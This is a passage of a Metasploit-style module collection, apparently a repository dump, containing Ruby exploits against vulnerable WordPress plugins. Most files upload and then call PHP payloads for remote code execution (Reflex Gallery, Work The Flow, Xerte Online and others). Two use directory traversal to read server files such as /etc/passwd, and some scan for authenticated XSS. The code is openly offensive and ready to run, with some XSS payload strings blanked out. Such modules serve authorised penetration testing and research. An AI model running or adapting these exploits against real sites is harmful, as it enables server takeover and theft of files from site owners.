'https://packetstormsecurity.com/files/132907/'] 32 | ], 33 | 'DisclosureDate' => 'Ago 04 2015' 34 | )) 35 | 36 | register_options( 37 | [ 38 | OptString.new('WP_USER', [true, 'A valid username', nil]), 39 | OptString.new('WP_PASS', [true, 'A valid password', nil]) 40 | ], self.class) 41 | end 42 | 43 | def check 44 | check_plugin_version_from_readme('database-sync', '0.5') 45 | end 46 | 47 | def user 48 | datastore['WP_USER'] 49 | end 50 | 51 | def password 52 | datastore['WP_PASS'] 53 | end 54 | 55 | def run_host(ip) 56 | vprint_status("#{peer} - Trying to login as: #{user}") 57 | cookie = wordpress_login(user, password) 58 | if cookie.nil? 59 | print_error("#{peer} - Unable to login as: #{user}") 60 | return 61 | end 62 | 63 | xss = "" 64 | 65 | res = send_request_cgi( 66 | 'uri' => normalize_uri(wordpress_url_backend, 'tools.php'), 67 | 'vars_get' => { 68 | 'page' => 'dbs_options', 69 | 'dbs_action' => 'sync', 70 | 'url' => "#{xss}" 71 | }, 72 | 'cookie' => cookie 73 | ) 74 | 75 | unless res && res.body 76 | print_error("#{peer} - Server did not respond in an expected way") 77 | return 78 | end 79 | 80 | if res.code == 200 && res.body.include?("#{xss}") 81 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the Database Sync 0.4 plugin for WordPress") 82 | p = store_local( 83 | 'wp_databasesync.http', 84 | 'text/html', 85 | res.body, 86 | "#{xss}" 87 | ) 88 | print_good("Save in: #{p}") 89 | else 90 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 91 | end 92 | end 93 | end 94 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_business_intelligence_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info( 16 | info, 17 | 'Name' => 'WordPress Business Intelligence Lite File Upload', 18 | 'Description' => %q{ 19 | The WordPress Business Intelligence Lite plugin contains an file upload 20 | vulnerability. We can upload arbitrary files to the upload folder, because 21 | the plugin also uses it's own file upload mechanism instead of the wordpress 22 | api it's possible to upload any file type. 23 | }, 24 | 'Author' => 25 | [ 26 | 'Manish Kishan Tanwar', # Vulnerability Discovery 27 | 'Roberto Soares Espreto ' # Metasploit Module 28 | ], 29 | 'License' => MSF_LICENSE, 30 | 'References' => 31 | [ 32 | ['WPVDB', '7200'], 33 | ['URL', 'http://packetstormsecurity.com/files/125927/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => ['php'], 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['WP Business Intelligence Lite 1.0.6', {}]], 39 | 'DefaultTarget' => 0, 40 | 'DisclosureDate' => 'Mar 31 2014')) # Secunia? 41 | end 42 | 43 | def check 44 | check_plugin_version_from_readme('wp-business-intelligence-lite', '1.1') 45 | end 46 | 47 | def exploit 48 | print_status("#{peer} - Trying to upload payload") 49 | filename = "#{rand_text_alpha_lower(6)}.php" 50 | 51 | print_status("#{peer} - Uploading payload") 52 | res = send_request_cgi( 53 | 'method' => 'POST', 54 | 'uri' => normalize_uri(wordpress_url_plugins, 'wp-business-intelligence-lite', 'resources', 'open-flash-chart', 'php-ofc-library', 'ofc_upload_image.php'), 55 | 'ctype' => 'text/plain', 56 | 'vars_get' => { 57 | 'name' => "#{filename}" 58 | }, 59 | 'data' => payload.encoded 60 | ) 61 | 62 | if res 63 | if res.code == 200 64 | register_files_for_cleanup(filename) 65 | else 66 | fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!") 67 | end 68 | else 69 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 70 | end 71 | 72 | print_status("#{peer} - Calling uploaded file #{filename}") 73 | send_request_cgi( 74 | { 'uri' => normalize_uri(wordpress_url_plugins, 'wp-business-intelligence-lite', 'resources', 'open-flash-chart', 'tmp-upload-images', filename) }, 75 | 5 76 | ) 77 | end 78 | end 79 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_visual_form_builder_xss_scanner.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Exploit::Remote::HTTP::Wordpress 11 | include Msf::Auxiliary::Scanner 12 | include Msf::Auxiliary::Report 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Visual Form Builder Plugin XSS Scanner', 17 | 'Description' => %q{ 18 | This module attempts to exploit a authenticated Cross-Site Scripting in Visual Form Builder 19 | Plugin for WordPress, version 2.8.2 and likely prior in order if the instance is vulnerable. 20 | }, 21 | 'Author' => 22 | [ 23 | 'Tim Coen', # Vulnerability Discovery 24 | 'Roberto Soares Espreto ' # Metasploit Module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['WPVDB', '7991'], 30 | ['URL', 'http://software-talk.org/blog/2015/05/sql-injection-reflected-xss-visual-form-builder-wordpress-plugin/'] 31 | ], 32 | 'DisclosureDate' => 'May 15 2015' 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('WP_USER', [true, 'A valid username', nil]), 38 | OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) 39 | ], self.class) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('visual-form-builder', '2.8.3') 44 | end 45 | 46 | def user 47 | datastore['WP_USER'] 48 | end 49 | 50 | def password 51 | datastore['WP_PASSWORD'] 52 | end 53 | 54 | def run_host(ip) 55 | print_status("#{peer} - Trying to login as #{user}") 56 | cookie = wordpress_login(user, password) 57 | if cookie.nil? 58 | print_error("#{peer} - Unable to login as #{user}") 59 | return 60 | end 61 | print_good("#{peer} - Login successful") 62 | 63 | xss = Rex::Text.rand_text_numeric(8) 64 | xss_payload = '>' 65 | 66 | res = send_request_cgi( 67 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 68 | 'vars_get' => { 69 | 'page' => 'visual-form-builder', 70 | 's' => "#{xss_payload}" 71 | }, 72 | 'cookie' => cookie 73 | ) 74 | 75 | unless res && res.body 76 | print_error("#{peer} - Server did not respond in an expected way") 77 | return 78 | end 79 | 80 | if res.code == 200 && res.body =~ /#{xss}/ 81 | print_good("#{peer} - Vulnerable to Cross-Site Scripting the \"Visual Form Builder 2.8.2\" plugin for WordPress") 82 | p = store_local('wp_visualform.http', 'text/html', res.body, "#{xss}") 83 | print_good("Save in: #{p}") 84 | else 85 | print_error("#{peer} - Failed, maybe the target isn't vulnerable.") 86 | end 87 | end 88 | end 89 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_ultimate_product_catalogue_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Ultimate Product Catalogue Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress Ultimate Product Catalogue 19 | version 3.1.1. The vulnerability allows for arbitrary file upload and remote code execution. 20 | }, 21 | 'Author' => 22 | [ 23 | 'Luca Ercoli', # Vulnerability discovery 24 | 'Roberto Soares Espreto ' # Metasploit module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['OSVDB', '121164'], 30 | ['WPVDB', '7939'], 31 | ['URL', 'http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability/'] 32 | ], 33 | 'Privileged' => false, 34 | 'Platform' => 'php', 35 | 'Arch' => ARCH_PHP, 36 | 'Targets' => [['WP Ultimate Product Caatalogue 3.1.1', {}]], 37 | 'DisclosureDate' => 'Apr 22 2015', 38 | 'DefaultTarget' => 0) 39 | ) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('ultimate-product-catalogue', '3.1.2') 44 | end 45 | 46 | def exploit 47 | php_pagename = rand_text_alpha(8 + rand(8)) + '.php' 48 | 49 | data = Rex::MIME::Message.new 50 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Products_Spreadsheet\"; filename=\"#{php_pagename}\"") 51 | post_data = data.to_s 52 | 53 | res = send_request_cgi( 54 | 'uri' => wordpress_url_admin_ajax, 55 | 'method' => 'POST', 56 | 'vars_get' => { 57 | 'action' => 'widgets_init', 58 | 'Action' => 'UPCP_AddProductSpreadsheet' 59 | }, 60 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 61 | 'data' => post_data 62 | ) 63 | 64 | if res 65 | if res.code == 200 && res.body =~ /0/ 66 | print_good("#{peer} - Our payload is at: #{php_pagename}.") 67 | register_files_for_cleanup(php_pagename) 68 | else 69 | fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 70 | end 71 | else 72 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 73 | end 74 | 75 | print_status("#{peer} - Calling payload...") 76 | send_request_cgi( 77 | { 'uri' => normalize_uri(wordpress_url_plugins, 'ultimate-product-catalogue', 'product-sheets', php_pagename) }, 78 | 5 79 | ) 80 | end 81 | end 82 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_xerteonline_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Xerte Online Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress Xerte Online 19 | plugin, version 0.32. The vulnerability allows for arbitrary file upload 20 | and remote code execution. 21 | }, 22 | 'Author' => 23 | [ 24 | 'Sammy', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['WPVDB', '6102'], 31 | ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-xerte-online-arbitrary-file-upload-vulnerability.html'], 32 | ['URL', 'http://packetstormsecurity.com/files/119220/'] 33 | ], 34 | 'Privileged' => false, 35 | 'Platform' => 'php', 36 | 'Arch' => ARCH_PHP, 37 | 'Targets' => [['Xerte Online 0.32', {}]], 38 | 'DisclosureDate' => 'Dec 30 2012', 39 | 'DefaultTarget' => 0) 40 | ) 41 | end 42 | 43 | def check 44 | check_plugin_version_from_readme('xerte-online', '0.36') 45 | end 46 | 47 | def exploit 48 | php_pagename = rand_text_alpha(4 + rand(4)) + '.php' 49 | 50 | data = Rex::MIME::Message.new 51 | data.add_part("/wp-content/plugins/xerte-online/xertefiles/#{php_pagename}", nil, nil, 'form-data; name="filename"') 52 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"filedata\"") 53 | post_data = data.to_s 54 | 55 | res = send_request_cgi( 56 | 'uri' => normalize_uri(wordpress_url_plugins, 'xerte-online', 'xertefiles', 'save.php'), 57 | 'method' => 'POST', 58 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 59 | 'data' => post_data 60 | ) 61 | 62 | if res 63 | if res.code == 200 && res.body.include?('file has been corrupted') 64 | print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") 65 | register_files_for_cleanup(php_pagename) 66 | else 67 | fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") 68 | end 69 | else 70 | fail_with(Failure::Unknown,'ERROR') 71 | end 72 | 73 | print_status("#{peer} - Calling payload...") 74 | send_request_cgi( 75 | { 'uri' => normalize_uri(wordpress_url_plugins, 'xerte-online', 'xertefiles', php_pagename) }, 76 | 5 77 | ) 78 | end 79 | end 80 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_font_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Font File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an authenticated directory traversal 19 | vulnerability in WordPress Plugin "Font" version 7.4, 20 | allowing to read arbitrary files with the web server privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['WPVDB', '8214'], 25 | ['CVE', '2015-7683'], 26 | ['PACKETSTORM', '133930'] 27 | ], 28 | 'Author' => 29 | [ 30 | 'David Moore', # Vulnerability Discovery 31 | 'Roberto Soares Espreto ' # Metasploit Module 32 | ], 33 | 'License' => MSF_LICENSE 34 | )) 35 | 36 | register_options( 37 | [ 38 | OptString.new('WP_USERNAME', [true, 'A valid username', nil]), 39 | OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]), 40 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']) 41 | ], self.class) 42 | end 43 | 44 | def user 45 | datastore['WP_USERNAME'] 46 | end 47 | 48 | def password 49 | datastore['WP_PASSWORD'] 50 | end 51 | 52 | def check 53 | check_plugin_version_from_readme('font', '7.5.1') 54 | end 55 | 56 | def run_host(ip) 57 | vprint_status("#{peer} - Trying to login as: #{user}") 58 | cookie = wordpress_login(user, password) 59 | fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{user}") if cookie.nil? 60 | 61 | filename = datastore['FILEPATH'] 62 | filename = filename[1, filename.length] if filename =~ %r{/^///} 63 | 64 | res = send_request_cgi( 65 | 'method' => 'POST', 66 | 'uri' => normalize_uri(wordpress_url_plugins, 'font', 'AjaxProxy.php'), 67 | 'vars_post' => { 68 | 'url' => "#{filename}", 69 | 'data[version]' => 7.4, 70 | 'format' => 'json', 71 | 'action' => 'cross_domain_request' 72 | }, 73 | 'cookie' => cookie 74 | ) 75 | 76 | if res && res.code == 200 && res.body.length > 0 77 | vprint_line("#{res.body}") 78 | fname = datastore['FILEPATH'] 79 | 80 | path = store_loot( 81 | 'font.traversal', 82 | 'text/plain', 83 | ip, 84 | res.body, 85 | fname 86 | ) 87 | 88 | print_good("#{peer} - File saved in: #{path}") 89 | else 90 | print_error("#{peer} - Nothing was downloaded. You can try to change the FILEPATH.") 91 | end 92 | end 93 | 94 | end 95 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_worktheflow_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Work The Flow Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin, 19 | version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution. 20 | }, 21 | 'Author' => 22 | [ 23 | 'Claudio Viviani', # Vulnerability discovery 24 | 'Roberto Soares Espreto ' # Metasploit module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['WPVDB', '7883'], 30 | ['EDB', '36640'], 31 | ['URL', 'http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html'] 32 | ], 33 | 'Privileged' => false, 34 | 'Platform' => 'php', 35 | 'Arch' => ARCH_PHP, 36 | 'Targets' => [['Work The Flow 2.5.2', {}]], 37 | 'DisclosureDate' => 'Mar 14 2015', 38 | 'DefaultTarget' => 0) 39 | ) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('work-the-flow-file-upload', '2.5.2') 44 | end 45 | 46 | def exploit 47 | php_pagename = rand_text_alpha(8 + rand(8)) + '.php' 48 | 49 | data = Rex::MIME::Message.new 50 | data.add_part('upload', nil, nil, 'form-data; name="action"') 51 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"") 52 | post_data = data.to_s 53 | 54 | res = send_request_cgi({ 55 | 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 56 | 'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'), 57 | 'method' => 'POST', 58 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 59 | 'data' => post_data 60 | }) 61 | 62 | if res 63 | if res.code == 200 64 | print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") 65 | register_files_for_cleanup(php_pagename) 66 | else 67 | fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}") 68 | end 69 | else 70 | fail_with('ERROR') 71 | end 72 | 73 | print_status("#{peer} - Calling payload...") 74 | send_request_cgi( 75 | 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 76 | 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename) 77 | ) 78 | end 79 | end 80 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress Reflex Gallery Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery 19 | version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution. 20 | }, 21 | 'Author' => 22 | [ 23 | 'Unknown', # Vulnerability discovery 24 | 'Roberto Soares Espreto ' # Metasploit module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['EDB', '36374'], 30 | ['OSVDB', '88853'], 31 | ['WPVDB', '7867'] 32 | ], 33 | 'Privileged' => false, 34 | 'Platform' => 'php', 35 | 'Arch' => ARCH_PHP, 36 | 'Targets' => [['Reflex Gallery 3.1.3', {}]], 37 | 'DisclosureDate' => 'Dec 30 2012', # OSVDB? EDB? WPVDB? Cannot set the date. 38 | 'DefaultTarget' => 0) 39 | ) 40 | end 41 | 42 | def check 43 | check_plugin_version_from_readme('reflex-gallery', '3.1.4') 44 | end 45 | 46 | def exploit 47 | php_pagename = rand_text_alpha(8 + rand(8)) + '.php' 48 | 49 | data = Rex::MIME::Message.new 50 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"") 51 | post_data = data.to_s 52 | 53 | time = Time.new 54 | year = time.year.to_s 55 | month = "%02d" % time.month 56 | 57 | res = send_request_cgi({ 58 | 'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'), 59 | 'method' => 'POST', 60 | 'vars_get' => { 61 | 'Year' => "#{year}", 62 | 'Month' => "#{month}" 63 | }, 64 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 65 | 'data' => post_data 66 | }) 67 | 68 | if res 69 | if res.code == 200 && res.body =~ /success|#{php_pagename}/ 70 | print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") 71 | register_files_for_cleanup(php_pagename) 72 | else 73 | fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 74 | end 75 | else 76 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 77 | end 78 | 79 | print_status("#{peer} - Calling payload...") 80 | send_request_cgi( 81 | 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename) 82 | ) 83 | end 84 | end 85 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress N-Media Website Contact Form Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form 19 | plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution. 20 | }, 21 | 'Author' => 22 | [ 23 | 'Claudio Viviani', # Vulnerability discovery 24 | 'Roberto Soares Espreto ' # Metasploit module 25 | ], 26 | 'License' => MSF_LICENSE, 27 | 'References' => 28 | [ 29 | ['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'], 30 | ['WPVDB', '7896'] 31 | ], 32 | 'Privileged' => false, 33 | 'Platform' => 'php', 34 | 'Arch' => ARCH_PHP, 35 | 'Targets' => [['N-Media WebSite Contact Form 1.3.4', {}]], 36 | 'DisclosureDate' => 'Apr 12 2015', 37 | 'DefaultTarget' => 0) 38 | ) 39 | end 40 | 41 | def check 42 | check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.5') 43 | end 44 | 45 | def exploit 46 | php_pagename = rand_text_alpha(4 + rand(4)) + '.php' 47 | 48 | data = Rex::MIME::Message.new 49 | data.add_part('upload', nil, nil, 'form-data; name="action"') 50 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"") 51 | data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"') 52 | post_data = data.to_s 53 | 54 | res = send_request_cgi({ 55 | 'uri' => wordpress_url_admin_ajax, 56 | 'method' => 'POST', 57 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 58 | 'data' => post_data 59 | }) 60 | 61 | if res 62 | if res.code == 200 && res.body =~ /filename/ 63 | begin 64 | new_php_pagename = JSON.parse(res.body)["filename"] 65 | rescue JSON::ParserError 66 | new_php_pagename = '' 67 | end 68 | print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...") 69 | register_files_for_cleanup(new_php_pagename) 70 | else 71 | fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}") 72 | end 73 | else 74 | fail_with('ERROR') 75 | end 76 | 77 | print_status("#{peer} - Calling payload...") 78 | send_request_cgi( 79 | 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename) 80 | ) 81 | end 82 | end 83 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_acf_frontend_display_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress ACF FrontEnd Display Upload Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits an arbitrary PHP code upload in the WordPress ACF 19 | FrontEnd Display version 2.0.5. The vulnerability allows for arbitrary 20 | file upload and remote code execution. 21 | }, 22 | 'Author' => 23 | [ 24 | 'TUNISIAN CYBER', # Vulnerability Discovery 25 | 'Roberto Soares Espreto ' # Metasploit Module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['EDB', '37514'], 31 | ['WPVDB', '7867'], 32 | ['URL', 'http://packetstormsecurity.com/files/132590/'], 33 | ['URL', 'http://www.antihackers.ro/blog/wordpress-acf-frontend-display-plugin-2-0-5-file-upload-vulnerability/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['ACF FrontEnd Display 2.0.5', {}]], 39 | 'DisclosureDate' => 'Jul 03 2015', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | check_plugin_version_from_readme('acf-frontend-display') 46 | end 47 | 48 | def exploit 49 | php_pagename = rand_text_alpha(8 + rand(8)) + '.php' 50 | 51 | data = Rex::MIME::Message.new 52 | data.add_part('upload', nil, nil, 'form-data; name="action"') 53 | data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"") 54 | post_data = data.to_s 55 | 56 | time = Time.new 57 | year = time.year.to_s 58 | 59 | res = send_request_cgi( 60 | 'uri' => normalize_uri(wordpress_url_plugins, 'acf-frontend-display', 'js', 'blueimp-jQuery-File-Upload-d45deb1', 'server', 'php', 'index.php'), 61 | 'method' => 'POST', 62 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 63 | 'data' => post_data 64 | ) 65 | 66 | if res 67 | if res.code == 200 && res.body.include?("#{php_pagename}") 68 | vprint_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") 69 | register_files_for_cleanup(php_pagename) 70 | else 71 | fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 72 | end 73 | else 74 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 75 | end 76 | 77 | print_status("#{peer} - Calling payload...") 78 | send_request_cgi( 79 | 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "uigen_#{year}", php_pagename) 80 | ) 81 | end 82 | end 83 | -------------------------------------------------------------------------------- /modules/auxiliary/scanner/http/wp_elisqlreports_file_read.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Auxiliary 9 | 10 | include Msf::Auxiliary::Report 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Auxiliary::Scanner 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'WordPress EZ SQL Reports File Read Vulnerability', 17 | 'Description' => %q{ 18 | This module exploits a authenticated directory traversal vulnerability 19 | in WordPress Plugin "EZ SQL Reports" version 4.11.33, allowing 20 | to read arbitrary files with the web server privileges. 21 | }, 22 | 'References' => 23 | [ 24 | ['WPVDB', '8184'], 25 | ['EDB', '38176'] 26 | ], 27 | 'Author' => 28 | [ 29 | 'Felipe Molina', # Vulnerability Discovery 30 | 'Roberto Soares Espreto ' # Metasploit Module 31 | ], 32 | 'License' => MSF_LICENSE 33 | )) 34 | 35 | register_options( 36 | [ 37 | OptString.new('WP_USER', [true, 'A valid username', nil]), 38 | OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]), 39 | OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), 40 | OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the wordpress root folder)', 7 ]) 41 | ], self.class) 42 | end 43 | 44 | def user 45 | datastore['WP_USER'] 46 | end 47 | 48 | def password 49 | datastore['WP_PASS'] 50 | end 51 | 52 | def check 53 | check_plugin_version_from_readme('elisqlreports', '4.11.37') 54 | end 55 | 56 | def run_host(ip) 57 | vprint_status("#{peer} - Trying to login as: #{user}") 58 | cookie = wordpress_login(user, password) 59 | if cookie.nil? 60 | print_error("#{peer} - Unable to login as: #{user}") 61 | return 62 | end 63 | 64 | traversal = '../' * datastore['DEPTH'] 65 | filename = datastore['FILEPATH'] 66 | filename = filename[1, filename.length] if filename =~ /^\// 67 | 68 | res = send_request_cgi( 69 | 'method' => 'GET', 70 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 71 | 'vars_get' => { 72 | 'page' => 'ELISQLREPORTS-settings', 73 | 'Download_SQL_Backup' => "#{traversal}#{filename}" 74 | }, 75 | 'cookie' => cookie 76 | ) 77 | 78 | if res && res.code == 200 && !res.body.include?('SQL Reports - Plugin Settings') 79 | 80 | vprint_line("\n#{res.body}") 81 | fname = datastore['FILEPATH'] 82 | path = store_loot( 83 | 'elisqlreports.traversal', 84 | 'text/plain', 85 | ip, 86 | res.body, 87 | fname 88 | ) 89 | print_good("#{peer} - File saved in: #{path}") 90 | else 91 | print_error("#{peer} - Nothing was downloaded. You can try to change the FILEPATH.") 92 | end 93 | end 94 | end 95 | -------------------------------------------------------------------------------- 